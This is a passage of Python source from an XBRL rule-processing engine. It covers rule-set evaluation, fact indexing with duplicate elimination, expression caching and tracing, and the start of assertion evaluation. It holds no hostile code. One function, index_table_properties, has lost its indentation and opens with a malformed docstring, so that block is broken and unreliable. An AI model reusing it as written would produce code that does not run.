    processing of the rules.
    """
    global_context = XuleGlobalContext(rule_set, model_xbrl, cntlr, options)
    if saved_taxonomies is not None and len(saved_taxonomies) > 0:
        global_context.other_taxonomies = saved_taxonomies

    # Set up trace files: remove stale trace output from a previous run.
    if getattr(global_context.options, "xule_trace_count", False):
        try:
            os.remove(global_context.options.xule_trace_count + ".csv")
        except FileNotFoundError:
            pass
        try:
            os.remove(global_context.options.xule_trace_count + ".txt")
        except FileNotFoundError:
            pass

    if getattr(global_context.options, "xule_time", None) is not None:
        total_start = datetime.datetime.today()

    if getattr(global_context.options, "xule_multi", False):
        # In multi-processing mode messages are drained by a dedicated thread.
        from .XuleMultiProcessing import output_message_queue
        t = Thread(target=output_message_queue, args=(global_context,))
        t.name = "Message Queue"
        t.start()

    if getattr(global_context.options, "xule_time", None) is not None:
        fact_index_start = datetime.datetime.today()

    # Create the processing context to build the index
    xule_context = XuleRuleContext(global_context)
    # Build an index on the facts in the model.
    index_model(xule_context)
    # Clean up
    del xule_context

    if getattr(global_context.options, "xule_time", None) is not None:
        fact_index_end = datetime.datetime.today()
        global_context.message_queue.print("Index build time %s." % (fact_index_end - fact_index_start))

    # Determine if constants should be precalced. This is determined by the --xule-precalc-constants option on the
    # command line. This is useful to simulate how the processor works in the server environment.
    if getattr(global_context.options, "xule_precalc_constants", False):
        constant_start = datetime.datetime.today()
        process_precalc_constants(global_context)
        constant_end = datetime.datetime.today()
        constant_time = constant_end - constant_start
        global_context.message_queue.print("Time to calculated non instance constants: %s" % (constant_time))
    # global_context.message_queue.logging("Processing Filing...")
    evaluate_rule_set(global_context)

    if getattr(global_context.options, "xule_time", None) is not None:
        total_end = datetime.datetime.today()
        if getattr(global_context.options, "xule_precalc_constants", False):
            global_context.message_queue.print(
                "Time to process excluding non instance constant: %s." % (total_end - total_start - constant_time))
        global_context.message_queue.print("Total time to process: %s." % (total_end - total_start))

    # Shutdown Message Queue
    if getattr(global_context.options, "xule_multi", False):
        global_context.message_queue.stop()
        global_context.message_queue.clear()
        t.join()

    # Save any taxonomies that were opened
    saved_taxonomies = global_context.other_taxonomies

    # clean up
    del global_context

    return saved_taxonomies
def evaluate_rule_set(global_context):
    """Process the rule set.

    :param global_context: The global processing context
    :type global_context: XuleGlobalContext

    This function loops through all the rules in the rule set and evaluates each rule.

    During evaluation of a rule, the evaluator can produce a XuleIterationStop exception. This exception indicates
    that processing of the current iteration of the rule can stop and go to the next iteration.
    """
    if getattr(global_context.options, "xule_time", None) is not None:
        times = []

    # Create a list of rules to skip. These are determined by the --xule-skip option on the command line.
    skip_rules = getattr(global_context.options, "xule_skip", None).split(",") if getattr(global_context.options,
                                                                                          "xule_skip",
                                                                                          None) is not None else None
    # Create a list of run only rules. This is the opposite of skip_rules. If run_only_rules is not None then only
    # those rules will be processed.
    run_only_rules = getattr(global_context.options, "xule_run_only", None).split(",") if getattr(
        global_context.options, "xule_run_only", None) is not None else None

    # use the term "cat" for catalog information. Read through the list of rules in the catalog.
    for file_num, cat_rules in global_context.catalog['rules_by_file'].items():
        for rule_name in sorted(cat_rules.keys()):
            cat_rule = cat_rules[rule_name]
            if skip_rules is not None and rule_name in skip_rules:
                global_context.message_queue.print("Skipping rule: %s" % rule_name)
                continue

            if not (run_only_rules is None or rule_name in run_only_rules):
                continue

            # get the AST for the rule from the ruleset
            rule = global_context.rule_set.getItem(cat_rule)

            if getattr(global_context.options, "xule_debug", False):
                global_context.message_queue.print(
                    "Processing: %s - %s" % (rule_name, datetime.datetime.today().strftime("%H:%M:%S.%f")))
                if global_context.model is not None:
                    global_context.message_queue.print(global_context.model.modelDocument.uri)

            # BUG FIX: rule_start/rule_end used to be assigned only when
            # --xule-time or --xule-trace-count was given, so the --xule-debug
            # timing print below raised a NameError when --xule-debug was used
            # on its own. Timestamps are cheap, so record them unconditionally.
            rule_start = datetime.datetime.today()
            try:
                # Establish the rule context. A new context is created for each rule.
                xule_context = XuleRuleContext(global_context,
                                               rule_name,
                                               file_num)
                # add the main table
                xule_context.iteration_table.add_table(rule['node_id'], xule_context.get_processing_id(rule['node_id']))

                # Evaluate the rule.
                if global_context.model is not None:
                    global_context.model.modelManager.showStatus("Processing rule {}".format(rule_name))
                evaluate(rule, xule_context)
            except (XuleProcessingError, XuleBuildTableError) as e:
                if getattr(global_context.options, "xule_crash", False):
                    raise
                else:
                    xule_context.global_context.message_queue.error("xule:error", str(e))
            except XuleIterationStop:
                pass
            except Exception as e:
                if getattr(global_context.options, "xule_crash", False):
                    raise
                else:
                    xule_context.global_context.message_queue.error("xule:error", "rule %s: %s" % (rule_name, str(e)))
            rule_end = datetime.datetime.today()

            if getattr(global_context.options, "xule_time", None) is not None:
                times.append((xule_context.rule_name, rule_end - rule_start))

            if getattr(global_context.options, "xule_debug", False):
                global_context.message_queue.print("%s time took: %s - %s " % (
                    rule_name, (rule_end - rule_start).total_seconds(),
                    datetime.datetime.today().strftime("%H:%M:%S.%f")))

            if getattr(global_context.options, "xule_trace_count", False):
                total_time = datetime.datetime.today() - rule_start
                print("Total iterations:", xule_context.iter_count,
                      "Messages:", xule_context.iter_message_count,
                      "Pass:", xule_context.iter_pass_count,
                      "Non alignment:", xule_context.iter_misaligned_count,
                      "Exception:", xule_context.iter_except_count)
                write_trace_count_csv(global_context.options.xule_trace_count, rule_name,
                                      global_context.expression_trace, rule, xule_context.iter_count, total_time)
                write_trace_count_string(global_context.options.xule_trace_count, rule_name,
                                         global_context.expression_trace, rule, xule_context.iter_count, total_time)
            # clean up
            del xule_context

    # Display timing information
    if getattr(global_context.options, "xule_time", None) is not None:
        global_context.message_queue.print("Total number of rules processed: %i" % len(times))
        # Rules slower than the --xule-time threshold, slowest first.
        slow_rules = sorted([timing_info for timing_info in times if
                             timing_info[1].total_seconds() > getattr(global_context.options, "xule_time", None)],
                            key=lambda tup: tup[1], reverse=True)
        global_context.message_queue.print(
            "Number of rules over %ss: %i" % (getattr(global_context.options, "xule_time", None), len(slow_rules)))
        for slow_rule in slow_rules:
            global_context.message_queue.print("Rule %s end. Took %s" % (slow_rule[0], slow_rule[1]))
def index_model(xule_context):
    """Index the facts in the Arelle model

    :param xule_context: The rule context
    :type xule_context: XuleRuleContext
    :returns: A dictionary of the facts. The dictionary is keyed by index keys.
    :rtype: dict

    This function goes through all the facts in the Arelle model and organizes them by potential index keys. The
    index is used for factset evaluation. The keys are the aspects of the facts. Additional keys are based on
    properties of the aspects (i.e. concept.is-monetary).
    """
    # fact_index: aspect key -> aspect value -> set of facts with that value.
    fact_index = collections.defaultdict(lambda: collections.defaultdict(set))
    # facts_to_index: full aspect tuple -> list of (de-duplicated) facts.
    facts_to_index = collections.defaultdict(list)

    if xule_context.model is not None:
        for model_fact in xule_context.model.factsInInstance:
            # Collect the built-in aspects (concept, period, unit, entity)...
            all_aspects = list()
            all_aspects.append((('builtin', 'concept'), model_fact.qname))

            period = model_to_xule_period(model_fact.context, xule_context)
            all_aspects.append((('builtin', 'period'), period))

            if model_fact.isNumeric:
                unit = model_to_xule_unit(model_fact.unit, xule_context)
                all_aspects.append((('builtin', 'unit'), unit))

            entity = model_to_xule_entity(model_fact.context, xule_context)
            all_aspects.append((('builtin', 'entity'), entity))

            # ...and the dimensional aspects, sorted for a deterministic key.
            for dim, mem in sorted(model_fact.context.qnameDims.items()):
                if mem.isExplicit:
                    all_aspects.append((('explicit_dimension', dim), mem.memberQname))
                else:
                    all_aspects.append((('explicit_dimension', dim), mem.typedMember.xValue))

            all_aspects = tuple(all_aspects)

            if getattr(xule_context.global_context.options, "xule_include_dups", False):
                facts_to_index[all_aspects].append(model_fact)
            else:
                # Need to eliminate duplicate facts.
                # Duplicate facts are facts that have the same aspects and same value (taking accuracy into
                # account for numeric facts). If there are duplicates with different values, then the duplicate
                # is not eliminated.
                if all_aspects in facts_to_index:
                    # there is a fact already
                    found_match = False
                    for position in range(len(facts_to_index[all_aspects])):
                        saved_fact = facts_to_index[all_aspects][position]
                        if model_fact.isNumeric:
                            saved_value, saved_decimals, cur_value, cur_decimals = get_decimalized_value(saved_fact,
                                                                                                        model_fact,
                                                                                                        xule_context)
                            if cur_value == saved_value:
                                found_match = True
                                if cur_decimals > saved_decimals:
                                    # The more precise of the two duplicates wins.
                                    facts_to_index[all_aspects][position] = model_fact
                                # otherwise, the saved fact is the better fact to index
                        else:
                            # fact is non numeric
                            if model_fact.xValue == saved_fact.xValue:
                                found_match = True
                    if not found_match:
                        # this is a duplicate with a different value
                        facts_to_index[all_aspects].append(model_fact)
                else:
                    # First time adding fact
                    facts_to_index[all_aspects].append(model_fact)

    # add the facts to the fact index.
    for all_aspects, facts in facts_to_index.items():
        for model_fact in facts:
            for aspect in all_aspects:
                # aspect[0] is the aspect(dimension) name. aspect[1] is the aspect(dimension) value
                fact_index[aspect[0]][aspect[1]].add(model_fact)
            for property in index_properties(model_fact):
                fact_index[property[0]][property[1]].add(model_fact)

    # get all the facts
    all_facts = {fact for facts in facts_to_index.values() for fact in facts}
    # for each aspect add a set of facts that don't have that aspect with a key value of None
    for aspect_key in fact_index:
        fact_index[aspect_key][None] = all_facts - set(it.chain.from_iterable(fact_index[aspect_key].values()))
    # save the list of all facts.
    fact_index['all'] = all_facts

    # Save the fact index
    xule_context.global_context.fact_index = fact_index

    # Create table index properties
    index_table_properties(xule_context)

    # Add the None facts for the table properties. These are the facts that don't have the property.
    for aspect_key in fact_index:
        if aspect_key != 'all' and None not in fact_index[aspect_key]:
            fact_index[aspect_key][None] = all_facts - set(it.chain.from_iterable(fact_index[aspect_key].values()))
def index_properties(model_fact):
    """Calculate the fact-index properties for a single fact.

    :param model_fact: The fact
    :type model_fact: ModelFact
    :returns: A list of properties to add to the fact index. The items of the
        list are 2 item tuples of (property identifier, property value).
    :rtype: list
    """
    # Standard aspect properties; entries whose function yields None are omitted.
    computed = ((key, fn(model_fact)) for key, fn in _FACT_INDEX_PROPERTIES.items())
    prop_list = [(key, value) for key, value in computed if value is not None]

    # XML attributes already represented as core concept metadata are skipped;
    # the rest become concept 'attribute' properties.
    skip_attrs = ('id', 'name', 'substitutionGroup', 'type',
                  '{http://www.xbrl.org/2003/instance}balance',
                  '{http://www.xbrl.org/2003/instance}periodType')
    for attr_name, attr_value in model_fact.concept.elementAttributesTuple:
        # attr_name is in Clark notation for qualified names.
        if attr_name not in skip_attrs:
            prop_list.append((('property', 'concept', 'attribute', qname(attr_name)), attr_value))

    return prop_list
def index_property_start(model_fact):
    """Index key for the period 'start' property.

    Duration contexts key on their start datetime; instant contexts key on
    the end datetime minus one day. Any other context yields None.
    """
    ctx = model_fact.context
    if ctx.isStartEndPeriod:
        return ctx.startDatetime
    if ctx.isInstantPeriod:
        return ctx.endDatetime - datetime.timedelta(days=1)
def index_property_end(model_fact):
    """Index key for the period 'end' property.

    Duration and instant contexts both key on the end datetime minus one
    day (the original code had two identical branches); any other context
    yields None.
    """
    ctx = model_fact.context
    if ctx.isStartEndPeriod or ctx.isInstantPeriod:
        return ctx.endDatetime - datetime.timedelta(days=1)
def index_property_days(model_fact):
    """Index key for the period 'days' property.

    Duration contexts key on the whole-day length of the period; instant
    contexts key on 0; any other context yields None.
    """
    ctx = model_fact.context
    if ctx.isStartEndPeriod:
        return (ctx.endDatetime - ctx.startDatetime).days
    if ctx.isInstantPeriod:
        return 0
def index_property_balance(model_fact):
    """Index key for the concept 'balance' property.

    Returns the concept's balance attribute, or None when the concept has
    no balance (the original's guarded return is equivalent).
    """
    return model_fact.concept.balance
# These are aspect properties that are used in a factset. I.e. @concept.is-monetary. The 'is-monetary' is an aspect
# property of the aspect 'concept'. This list identifies all the expected properties that will be in the fact index.
# This is a dictionary with the key being the property identifier and the value being the function to calculate the
# value of the property with a fact. The property identifier is a 3 part tuple:
#   1 - 'property' - This part is always 'property'.
#   2 - the aspect name
#   3 - the property name
_FACT_INDEX_PROPERTIES = {
    ('property', 'concept', 'period-type'): lambda f: f.concept.periodType,
    ('property', 'concept', 'balance'): index_property_balance,
    ('property', 'concept', 'data-type'): lambda f: f.concept.typeQname,
    ('property', 'concept', 'base-type'): lambda f: f.concept.baseXbrliTypeQname,
    ('property', 'concept', 'is-monetary'): lambda f: f.concept.isMonetary,
    ('property', 'concept', 'is-numeric'): lambda f: f.concept.isNumeric,
    ('property', 'concept', 'substitution'): lambda f: f.concept.substitutionGroupQname,
    ('property', 'concept', 'namespace-uri'): lambda f: f.concept.qname.namespaceURI,
    ('property', 'concept', 'local-name'): lambda f: f.concept.qname.localName,
    ('property', 'concept', 'is-abstract'): lambda f: f.concept.isAbstract,
    ('property', 'concept', 'id'): lambda f: f.id,
    ('property', 'period', 'start'): index_property_start,
    ('property', 'period', 'end'): index_property_end,
    ('property', 'period', 'days'): index_property_days,
    ('property', 'entity', 'scheme'): lambda f: f.context.entityIdentifier[0],  # entityIdentifier[0] is the scheme
    ('property', 'entity', 'id'): lambda f: f.context.entityIdentifier[1]
    # entityIdentifer[1] is the id
}
def index_table_properties(xule_context):
""""Add the table properites to the fact index
:type xule_context: XuleRuleContext
"""
# Go through each table.
for cube_base in XuleDimensionCube.base_dimension_sets(xule_context.model):
cube = XuleDimensionCube(xule_context.model, *cube_base, include_facts=True)
xule_context.global_context.fact_index[('builtin', 'cube')][cube] |= cube.facts
xule_context.global_context.fact_index[('property', 'cube', 'name')][cube.hypercube.qname] |= cube.facts
xule_context.global_context.fact_index[('property', 'cube', 'drs-role')][cube.drs_role.roleURI] |= cube.facts
def get_decimalized_value(fact_a, fact_b, xule_context):
    """Adjust 2 fact values based on accuracy.

    :param fact_a: First fact
    :type fact_a: ModelFact
    :param fact_b: Second fact
    :type fact_b: ModelFact
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :returns: A tuple of (fact_a value, fact_a decimals, fact_b value, fact_b decimals)
    :rtype: tuple

    Round the fact values to the minimum accuracy defined by the decimals attribute of the facts.

    Example:
        Fact value of 1,234,567 with decimals -3 is rounded to 1,235,000

    NOTE(review): a fact whose own decimals is INF is returned unrounded even
    when the other fact has finite precision, so the two returned values may
    reflect different accuracies — confirm this asymmetry is intended.
    """
    fact_a_decimals = get_decimals(fact_a, xule_context)
    fact_b_decimals = get_decimals(fact_b, xule_context)

    # Compare both values at the coarser of the two precisions. The INF
    # guards also prevent round(x, inf), which would raise.
    min_decimals = min(fact_a_decimals, fact_b_decimals)

    fact_a_value = fact_a.xValue if fact_a_decimals == float('inf') else round(fact_a.xValue, min_decimals)
    fact_b_value = fact_b.xValue if fact_b_decimals == float('inf') else round(fact_b.xValue, min_decimals)

    return fact_a_value, fact_a_decimals, fact_b_value, fact_b_decimals
def get_decimals(fact, xule_context):
    """Return the decimals of a fact as a number.

    :param fact: The fact to get the accuracy from
    :type fact: ModelFact
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :returns: float('inf') when decimals is absent or 'INF', otherwise the
        integer decimals value
    :raises XuleProcessingError: when the decimals attribute is not an integer
    """
    raw_decimals = fact.decimals
    if raw_decimals is None or raw_decimals.strip() == 'INF':
        return float('inf')
    try:
        return int(raw_decimals)
    except ValueError:
        raise XuleProcessingError(_("%s Fact contains invalid decimal value of %s" % (fact.qname, fact.decimals)),
                                  xule_context)
def evaluate(rule_part, xule_context, trace_dependent=False, override_table_id=None):
    """General evaluator for an expression.

    :param rule_part: The expression being evaluated
    :type rule_part: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :param trace_dependent: Debugging indicator
    :type trace_dependent: bool
    :param override_table_id: A table id to use instead of the table id of the rule_part.
    :type override_table_id: int
    :returns: The value of the expression for the current iteration
    :rtype: XuleValue

    This is the main evaluator for evaluating rule expressions. If the rule_part is an iterable expression it will be evaluated. The returned
    values will be put on the iteration table and a single value will be selected as the value of the expression for the current iteration. If
    the rule_part is a singleton expression, then it will be evaluated and the value returned.

    Each type of expression (i.e. assertion, if statement, for loop, literal integer, add operation) has its own evaluator. This evaluator will call
    the appropriate evaluator for the expression (looked up by expression name in the EVALUATOR dispatch table).

    This evaluator handles caching expression evaluations for performance.
    This evaluator also includes capturing information about the evaluation for debugging purposes.
    """
    try:
        # Setup trace information.
        if getattr(xule_context.global_context.options, "xule_trace", False) or getattr(
                xule_context.global_context.options, "xule_trace_count", False):
            trace_is_dependent = "D" if trace_dependent else " "
            trace_source = "U"
            trace_written = False
        if getattr(xule_context.global_context.options, "xule_trace_count", False):
            if rule_part['node_id'] not in xule_context.expression_trace:
                # First evaluation of this expression - set up its trace counters.
                # Each single-letter key counts how the value was obtained; the
                # matching '<key>-t' entry accumulates the time spent.
                xule_context.expression_trace[rule_part['node_id']] = {'iterations': 1,  # total
                                                                      'iterations-t': datetime.timedelta(0),
                                                                      'U': 0,
                                                                      # unknown iterations - should always be none
                                                                      'U-t': datetime.timedelta(0),
                                                                      'E': 0,  # evaluated iterables
                                                                      'E-t': datetime.timedelta(0),
                                                                      'c': 0,  # from cache
                                                                      'c-t': datetime.timedelta(0),
                                                                      'T': 0,  # from table
                                                                      'T-t': datetime.timedelta(0),
                                                                      'e': 0,  # evaluate non iterable
                                                                      'e-t': datetime.timedelta(0),
                                                                      'R': 0,  # re-evaluate
                                                                      'R-t': datetime.timedelta(0),
                                                                      'r': 0,  # re-evaluate non iterable
                                                                      'r-t': datetime.timedelta(0),
                                                                      'isE': 0,
                                                                      # iteration stop on evaluation of iterable
                                                                      'isE-t': datetime.timedelta(0),
                                                                      'ise': 0,
                                                                      # iteration stop on evaluate of non iterable
                                                                      'ise-t': datetime.timedelta(0),
                                                                      'isu': 0,
                                                                      # iteration stop on unbound during post value processing
                                                                      'isu-t': datetime.timedelta(0),
                                                                      'ex': 0,  # exception during iteration evaluation
                                                                      'ex-t': datetime.timedelta(0),
                                                                      'name': rule_part['exprName']
                                                                      }
            else:
                xule_context.expression_trace[rule_part['node_id']]['iterations'] += 1
            expression_trace_start = datetime.datetime.today()
        #processing_id = xule_context.get_processing_id(rule_part['node_id'])
        processing_id = xule_context.get_column_id(rule_part['node_id'])
        rule_part_name = rule_part['exprName']
        # trace
        if getattr(xule_context.global_context.options, "xule_trace", False):
            xule_context.trace_level += 1
            trace = " " * xule_context.trace_level
            trace += rule_part_name + " " + str(processing_id)  # + " " + str(rule_part)
            print(">", trace_is_dependent, " ", processing_id, trace.replace("\n", " "))
        if ('is_iterable' in rule_part):
            # is_iterable is always true if it is present, so don't need to check the actual value
            xule_context.used_expressions.add(processing_id)
            if 'is_dependent' in rule_part:
                is_dependent = rule_part['is_dependent']
                # Check whether the iteration table already has a value for this expression.
                value = xule_context.iteration_table.current_value(processing_id, xule_context)
                if value is None:
                    # Will evaluate or get from cache.
                    values = None
                    if is_dependent:
                        xule_context.iteration_table.current_table.make_dependent()
                    try:
                        if getattr(xule_context.global_context.options, "xule_no_cache", False):
                            # if xule_context.global_context.no_cache:
                            values = None
                        else:
                            # Only consult the local cache for expressions that are off the
                            # main table or that are dependent.
                            if (rule_part.get('table_id') != xule_context.iteration_table.main_table_id or
                                    is_dependent):
                                local_cache_key = get_local_cache_key(rule_part, xule_context)
                                if local_cache_key is not None:
                                    values = xule_context.local_cache.get(local_cache_key)
                            else:
                                values = None
                        if values is None:
                            # Cache miss (or caching disabled) - dispatch to the expression's evaluator.
                            values = EVALUATOR[rule_part_name](rule_part, xule_context)
                            trace_source = "E"
                            if not getattr(xule_context.global_context.options, "xule_no_cache", False):
                                # if not xule_context.global_context.no_cache:
                                if (rule_part.get('table_id') != xule_context.iteration_table.main_table_id or
                                        is_dependent):
                                    local_cache_key = get_local_cache_key(rule_part, xule_context)
                                    if local_cache_key is not None:
                                        # print("caching", rule_part['node_id'], [(x[0], x[1].format_value()[:10]) for x in local_cache_key[1]], len(values.values))
                                        xule_context.local_cache[local_cache_key] = values
                        else:
                            # print("using cache", rule_part['node_id'], [x[0] for x in local_cache_key[1]])
                            trace_source = "c"
                    except XuleIterationStop:
                        if getattr(xule_context.global_context.options, "xule_trace", False):
                            # if xule_context.show_trace:
                            xule_context.trace_level -= 1
                        if getattr(xule_context.global_context.options, "xule_trace_count", False):
                            # if xule_context.show_trace_count:
                            xule_context.expression_trace[rule_part['node_id']][
                                'iterations-t'] += datetime.datetime.today() - expression_trace_start
                            xule_context.expression_trace[rule_part['node_id']][
                                'isE-t'] += datetime.datetime.today() - expression_trace_start
                            xule_context.expression_trace[rule_part['node_id']]['isE'] += 1
                            trace_written = True
                        raise
                    except XuleReEvaluate:
                        trace_source = 'R'
                        raise
                    else:
                        # add - add values to expression cache
                        xule_context.iteration_table.add_column(rule_part, override_table_id or rule_part['table_id'],
                                                                processing_id, values, xule_context)
                        value = xule_context.iteration_table.current_value(processing_id, xule_context)
                        # The tags on the value may not apply to this iteration. For exmaple, if the expression is not dependent, then it will
                        # be evaluated once and stored in the local cache with the tags from the first evaluation.
                        if value is not None and value.tags is not None:
                            new_tags = value.tags.copy()
                            new_tags.update(xule_context.tags)
                            value.tags = new_tags
                else:
                    trace_source = "T"
            else:
                raise XuleProcessingError(
                    _("Internal error: Found iterable (%s) that does not have a dependency flag." % rule_part_name),
                    xule_context)
        else:  # is_iterable
            # Singleton (non-iterable) expression.
            trace_source = "e"
            # Check the cache - only if the expression does have something in it that produces multiple results and its not a varRef.
            if getattr(xule_context.global_context.options, "xule_no_cache", False):
                local_cache_key = None
            else:
                if rule_part['number'] == 'single' and rule_part['exprName'] not in ('varRef', 'tagRef'):
                    local_cache_key = get_local_cache_key(rule_part, xule_context)
                else:
                    local_cache_key = None
            if local_cache_key is None:
                value = None
            else:
                cache_value = xule_context.local_cache.get(local_cache_key)
                value = cache_value.clone() if cache_value is not None else None
                # The tags on the value may not apply to this iteration. For exmaple, if the expression is not dependent, then it will
                # be evaluated once and stored in the local cache with the tags from the first evaluation.
                if value is not None and value.tags is not None:
                    new_tags = value.tags.copy()
                    new_tags.update(xule_context.tags)
                    value.tags = new_tags
            if value is None:
                try:
                    value = EVALUATOR[rule_part_name](rule_part, xule_context)
                except XuleIterationStop:
                    if getattr(xule_context.global_context.options, "xule_trace", False):
                        # if xule_context.show_trace:
                        xule_context.trace_level -= 1
                    if getattr(xule_context.global_context.options, "xule_trace_count", False):
                        # if xule_context.show_trace_count:
                        xule_context.expression_trace[rule_part['node_id']][
                            'iterations-t'] += datetime.datetime.today() - expression_trace_start
                        xule_context.expression_trace[rule_part['node_id']][
                            'ise-t'] += datetime.datetime.today() - expression_trace_start
                        xule_context.expression_trace[rule_part['node_id']]['ise'] += 1
                        trace_written = True
                    raise
                except XuleReEvaluate as e:
                    trace_source = 'r'
                    raise
                if not getattr(xule_context.global_context.options, "xule_no_cache", False):
                    if local_cache_key is not None:
                        # The cache value is cloned so it is not corrupted by further processing after this point.
                        xule_context.local_cache[local_cache_key] = value.clone() if value is not None else value
        # If the look_for_alignment flag is set, check if there is now alignment after adding the column. This is used in 'where' clause processing.
        if (xule_context.look_for_alignment and
                # rule_part.has_alignment and
                value.aligned_result_only and
                rule_part.get('table_id') in xule_context.where_table_ids and
                rule_part['node_id'] in xule_context.where_dependent_iterables):
            raise XuleReEvaluate(xule_context.iteration_table.any_alignment)
        if getattr(xule_context.global_context.options, "xule_trace", False):
            # if xule_context.show_trace:
            sugar = sugar_trace(value, rule_part, xule_context)
            trace_info = (xule_context.trace_level, rule_part_name, sugar, value)
            xule_context.trace.appendleft(trace_info)
            post_trace = " " * xule_context.trace_level
            post_trace += ("NONE" if value is None else value.format_value()) + format_trace_info(trace_info[1],
                                                                                                 trace_info[2], {},
                                                                                                 xule_context)
            print("<", trace_is_dependent, trace_source, processing_id, post_trace.replace("\n", " "))
            xule_context.trace_level -= 1
        try:
            # Record tags/facts for the value; raises XuleIterationStop for unbound values.
            value = post_evaluate_value(rule_part, value, xule_context)
        finally:
            if getattr(xule_context.global_context.options, "xule_trace_count", False):
                # if xule_context.show_trace_count:
                xule_context.expression_trace[rule_part['node_id']][trace_source] += 1
                xule_context.expression_trace[rule_part['node_id']]['iterations-t'] += (
                        datetime.datetime.today() - expression_trace_start)
                xule_context.expression_trace[rule_part['node_id']][trace_source + '-t'] += (
                        datetime.datetime.today() - expression_trace_start)
                trace_written = True
    finally:
        # Ensure trace timing is recorded even when an exception escaped above.
        if getattr(xule_context.global_context.options, "xule_trace_count", False) and not trace_written:
            xule_context.expression_trace[rule_part['node_id']][
                'iterations-t'] += datetime.datetime.today() - expression_trace_start
            xule_context.expression_trace[rule_part['node_id']][trace_source + '-t'] += (
                    datetime.datetime.today() - expression_trace_start)
            xule_context.expression_trace[rule_part['node_id']][trace_source] += 1
            trace_written = True
    return value
def post_evaluate_value(rule_part, value, xule_context):
    """Record tags and facts for an evaluated value on the processing context.

    :param rule_part: The expression being evaluated
    :type rule_part: dict
    :param value: The evaluated value
    :type value: XuleValue
    :param xule_context: The rule processing context
    :type xule_context: XuleRuleContext
    :returns: The value, unchanged
    :rtype: XuleValue
    :raises XuleIterationStop: when the value is None or of type 'unbound'
    """
    if value is None:
        raise XuleIterationStop(XuleValue(xule_context, None, 'unbound'))

    # Track facts that contributed to this value.
    if value.fact is not None:
        xule_context.facts[value.fact] = None
    if value.facts is not None:
        xule_context.facts.update(value.facts)

    # Carry the value's tags onto the context.
    if value.tags is not None:
        xule_context.tags.update(value.tags)

    if value.aligned_result_only == True:
        xule_context.aligned_result_only = True

    if value.used_expressions is not None:
        xule_context.used_expressions.update(value.used_expressions)

    # An unbound value stops the current iteration.
    if value.type == 'unbound':
        raise XuleIterationStop(value)

    return value
def get_local_cache_key(rule_part, xule_context):
    """Build a key for caching the value of an expression in the local cache.

    :param rule_part: xule expression
    :type rule_part: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :returns: A (node_id, dependent-variable-values, alignment) tuple, or None
        when the expression must not be cached.
    """
    # 'for' bodies and non-cacheable function/macro references are never cached.
    expr_name = rule_part['exprName']
    if expr_name == 'forBodyExpr':
        return None
    if expr_name in ('functionReference', 'macroRef') and rule_part.get('cacheable') != True:
        return None

    dep_var_index = set()
    for var_ref in rule_part['var_refs']:
        # var_ref tuple: 0 = var declaration id, 1 = var name, 2 = var ref ast,
        # 3 = var type (1=block/'for' variable, 2=constant, 3=function argument, factset variable)
        var_info = xule_context.find_var(var_ref[1], var_ref[0])
        if var_info['type'] == xule_context._VAR_TYPE_CONSTANT:
            # Constants: the var_info does not hold the value. Only include the
            # constant if the used_expressions show it was actually used.
            if xule_context.get_processing_id(var_info['expr']['node_id']) in xule_context.used_expressions:
                const_value = evaluate(var_info['expr'],
                                       xule_context,
                                       override_table_id=var_ref[2]['table_id'])
                dep_var_index.add((var_info['name'], const_value))
        elif var_ref[0] in xule_context.vars and var_info['calculated']:
            dep_var_index.add((var_info['name'], var_info['value']))

    alignment = xule_context.iteration_table.current_alignment if rule_part['has_alignment'] else None
    return (rule_part['node_id'], frozenset(dep_var_index), alignment)
def evaluate_assertion(assert_rule, xule_context):
    """Evaluator for an assertion rule.

    :param assert_rule: Rule expression for an assertion
    :type assert_rule: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext

    This evaluator evaluates an assertion rule. It will keep evaluating the assertion rule until the iteration table is empty. This
    is how it can produce multiple messages for a single rule. For example, a rule @Assets < 0 will produce a message for each individual
    Asset value that is less than zero. If there are 3 values for Assets and 2 of them are less than zero, it will produce 2 messages.

    An assertion will evaluate to a boolean value. If the assertion is marked as 'satisfied' and the
    evaluated value is true, the assertion will produce a message. If the assertion is marked as 'unsatisfied' and the evaluated value is false,
    the assertion will produce a message.
    """
    # Keep evaluating the rule while there are iterations. This is done in a While True loop so there is always at least one iteration. This is for rules that
    # do not have iterable expressions in them (i.e. 1 + 2).
    while True:
        xule_context.iter_count += 1
        try:
            xule_value = evaluate(assert_rule['body'], xule_context)
        except XuleIterationStop:
            # An unbound result for this iteration - no message, move to the next iteration.
            xule_context.iter_pass_count += 1
            pass
        except:
            xule_context.iter_except_count += 1
            raise
        else:
            # There were no exceptions. Check the results of the rule and create the message.
            # Check if the rule expects only aligned values. When a rule has aligned values then the none aligned results are ignored.
            # This prevents a rule like 1 + @Assets from producing a result when there are no Assets in a filing. When this happens, the @Assetss will have
            # a none aligned unbound value. The plus operation will treat this as 0 and produce a value of 1. However, this value should not result in a message.
            # When a factset is evluated, it trips the aligned_result_only flag.
            if xule_value.type != 'unbound' and not (
                    xule_context.iteration_table.current_alignment is None and xule_context.aligned_result_only):
                if xule_value.type != 'bool':
                    raise XuleProcessingError(_("Raise %s did not evaluate to a boolean, found '%s'." % (
                        xule_context.rule_name, xule_value.type)), xule_context)
                # Determine if a message should be sent
                send_message = ((assert_rule['satisfactionType'] == 'satisfied' and xule_value.value == True) or
                                (assert_rule['satisfactionType'] == 'unsatisfied' and xule_value.value == False))
                if send_message:
                    xule_context.iter_message_count += 1
                    messages = dict()
                    # Process each of the results in the rule. The Results are the messages that are produced.
                    for rule_result in assert_rule.get('results', list()):
                        messages[rule_result['resultName']] = result_message(assert_rule, rule_result, xule_value,
                                                                             xule_context)
                    # get severity
                    if 'severity' not in messages:
                        # default severity
                        messages['severity'] = 'error'
                    severity = messages['severity']
                    # message - this is the main message
                    main_message = messages['message'].value if 'message' in messages else XuleString(
                        'No message supplied')
                    messages.pop('message', None)
                    full_rule_name = xule_context.rule_name
                    # Handle rule suffix
                    if 'rule-suffix' in messages:
                        full_rule_name += '.' + messages['rule-suffix']
                    filing_url = xule_context.model.modelDocument.uri if xule_context.model is not None else ''
                    # The rule_focus is the model object that is the focus fo the rule. This can be a modelFact, modelConcept or modelDocument.
                    # It is used by the logger to provide additional location information about the thing (i.e. fact) that is the focus of the
                    # message fom the rule.
                    rule_focus = messages.pop('rule-focus', None)
                    if rule_focus is None:
